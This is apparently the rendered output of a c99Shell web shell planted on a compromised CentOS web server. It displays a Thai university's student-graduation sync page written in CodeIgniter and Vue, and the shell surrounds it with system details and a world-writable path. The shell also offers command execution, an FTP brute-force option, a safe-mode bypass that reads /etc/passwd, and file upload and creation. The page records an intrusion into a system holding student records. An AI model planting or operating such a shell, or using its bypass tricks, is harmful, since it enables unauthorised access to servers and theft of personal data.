!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/eregis-12022565/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_SyncGraduate.php (10.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="<?=base_url().'asset/css/bootstrap.min.css';?>">
    <title>ซิงค์ข้อมูล นักศึกษา</title>
  </head>
  <body>
<div class="container" id="app">
    <div class="row">
        <div class="col-12 mt-5 text-center">
            <h3>ซิงค์ข้อมูลนักศึกษาที่สำเร็จการศึกษา</h3>
        </div>
        <div class="col-12 mt-5 text-center">
            <table class="table">
                <tr>
                    <th>
                        ลำดับ
                    </th>
                    <th>
                        ชื่อฐานข้อมูล ของ ระบบทะเบียน
                    </th>
                    <th>
                        ชื่อฐานข้อมูล ของ กระทรวงอุดมศึกษา
                    </th>
                    <th>
                        ปีการศึกษา
                    </th>
                <!--    <th>
                        ภาคเรียน
                    </th> -->
                    <th>
                    </th>
                </tr>
                <tr>
                    <td>
                        1
                    </td>
                    <td>
                        rg_student 
                    </td>
                    <td>
                        uoc_std
                    </td>
                    <td>
                     <select class="form-control" v-model="setstdAdY" @change="fetchTmId()">
                            <option v-for="(item,index) in getstdAdY" :key="index">{{item.ssmAcY}}</option>
                     </select>
                    </td>
                   <!-- <td>
                     <select class="form-control" v-model="setssmTmId">
                            <option v-for="(item,index) in getssmTmId" :key="index">{{item.ssmTmId}}</option>
                     </select>
                    </td> -->
                    <td>
                       <a class="btn btn-primary text-white" @click="Sync()">Sync ข้อมูล</a>
                    </td>
                </tr>
            </table>
        </div>
        <div class="alert alert-success col-12" role="alert" v-if="sync">
               Sync ข้อมูลนักศึกษาที่กำลังศึกษาสำเร็จ
        </div>
        <!--<ul class="nav nav-tabs" v-if="sync">
                <li class="nav-item">
                    <a :class="{'nav-link':true,'active':tabs == 1}"  @click="tabs =1">รายชื่อนักศึกษาที่ ซึ่งเข้าสู่ระบบได้</a>
                </li>
                <li class="nav-item">
                    <a :class="{'nav-link text-danger':true ,'active':tabs == 2}" @click="tabs =2">รายชื่อนักศึกษาที่ ไม่สามารถซึ่งเข้าสู่ระบบได้</a>
                </li>
        </ul> -->
        <div class="col-12 mt-2 table-responsive" v-if="sync && tabs ==1">
        <a class="btn btn-success text-white" v-bind:href="baseUrl+'index_codeigniter.php/eregis/service/ExportGraduate?setstdAdY='+setstdAdY+'&setssmTmId='+setssmTmId" target="_blank">Export Excel</a>
            <table class="table table-bordered text-nowrap">
                <thead>
                    <tr>
                        <th class="text-center">
                            ลำดับ
                        </th>
                        <th>
                             รหัสนักศึกษา
                        </th>
                        <th>
                            ชื่อ-สกุล
                        </th>
                        <th>หลักสูตร</th>
                        <th>
                            ชั้นปี
                        </th>
                        <th>
                            สถานะ
                        </th>
                    </tr>
                </thead>
                <tbody>
                    <tr v-for="(item,index) in stdMath" ::key="index">
                         <td class="text-center">
                           {{(index + 1)}}
                        </td>
                        <td>
                            {{item.stdCode}}
                        </td>
                        <td>
                             {{item.pfName+' '+item.stdName+' '+item.stdSurname}}
                        </td>
                        <td>
                          {{item.curName}}
                        </td>   
                        <td>
                            {{item.stdSyId}}
                        </td>
                        <td>
                            {{item.sstName}}
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
        <!--
        <div class="col-12 mt-2 table-responsive" v-if="sync && tabs ==2">
            <h4 class="text-danger"> กรุณาอัพเดทข้อมูล สัญชาติ ประเทศ และ ที่อยู่ </h4>
            <table class="table table-bordered">
                <thead>
                    <tr>
                        <th class="text-center">
                            ลำดับ
                        </th>
                        <th>
                             รหัสนักศึกษา
                        </th>
                        <th>
                            ชื่อ-สกุล
                        </th>
                        <th>หลักสูตร</th>
                        <th>
                            ชั้นปี
                        </th>
                    </tr>
                </thead>
                <tbody>
                    <tr v-for="(item,index) in stdNotMath" ::key="index">
                         <td class="text-center">
                           {{(index + 1)}}
                        </td>
                        <td>
                            {{item.stdCode}}
                        </td>
                        <td>
                             {{item.pfName+' '+item.stdName+' '+item.stdSurname}}
                        </td>
                        <td>
                          {{item.curName}}
                        </td>   
                        <td>
                            {{item.stdSyId}}
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
-->
    <div class="vld-parent">
        <loading :active.sync="isLoading" 
        :can-cancel="true" 
        :is-full-page="fullPage"
        :opacity="0.7"></loading>
    </div>
</div>
<br>
<br>
<script src="<?=base_url().'asset/js/vue.js';?>"></script>
<script
  src="<?=base_url().'asset/js/jquery-3.4.1.js';?>"></script>
<!-- Lastly add this package -->
<script src="<?=base_url().'asset/js/vue-loading-overlay@3.js';?>"></script>
<link href="<?=base_url().'asset/css/vue-loading.css';?>" rel="stylesheet">
<!-- Init the plugin and component-->
<script type="text/javascript">
    window.onload = function () {
     Vue.use(VueLoading);
     Vue.component('loading', VueLoading)
     var app = new Vue({
      el:'#app',
      data(){
          return{
              tabs:1,
              baseUrl:'<?=base_url();?>',
              sync:false,
              getstdAdY:0,
              setstdAdY:0,
             // getssmTmId:0,
              setssmTmId:0,
              isLoading: true,
              fullPage: true,
              stdMath:[],
              stdNotMath:[]

          }
      },
      created(){
        this.fetchStdAdy()
        setTimeout( ()=> {
                    this.isLoading = false
                },1000) 
       /* setTimeout( ()=> {
            this.fetchTmId()
            this.isLoading = false
        }, 1000)*/
      },
      methods: {
        fetchStdAdy(){
            $.get(this.baseUrl+'index_codeigniter.php/eregis/service/fetchStdAdy', data =>{
                this.getstdAdY = JSON.parse(data)
                this.setstdAdY = this.getstdAdY[0].ssmAcY
               
            })
        },
        /*fetchTmId(){
            this.isLoading = true
            $.get(this.baseUrl+'index_codeigniter.php/eregis/service/fetchTmId?stdAdY='+this.setstdAdY, data =>{
                this.getssmTmId = JSON.parse(data)
                this.setssmTmId = this.getssmTmId[0].ssmTmId
                setTimeout( ()=> {
                    this.isLoading = false
                },1000)
            })
        },*/
        Sync(){
         var con = confirm('ต้องการซิงค์ข้อมูลหรือไม่ ?')
          if(con){
            this.isLoading = true
            $.post(this.baseUrl+'index_codeigniter.php/eregis/service/syncGraduate',{
              setstdAdY:this.setstdAdY,
             // setssmTmId:this.setssmTmId
            }).done(data =>{
                this.isLoading = false
                this.sync = true
                this.FetchSync()
            });
          }
        },
        FetchSync(){
            $.get(this.baseUrl+'index_codeigniter.php/eregis/service/fetchUocGraduate',{
              setstdAdY:this.setstdAdY,
              //setssmTmId:this.setssmTmId
            })
            .done(data =>{
                var res = JSON.parse(data)
                this.stdMath = res.stds
            });
        },
        /*FetchSyncNotMath(){
            $.get(this.baseUrl+'index_codeigniter.php/eregis/service/fetchSyncNotMath',{
              setstdAdY:this.setstdAdY,
              setssmTmId:this.setssmTmId
            })
            .done(data =>{
                var res = JSON.parse(data)
                this.stdNotMath = res.stds
            });
        }*/
      },  
    })
    }
</script>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.014 ]--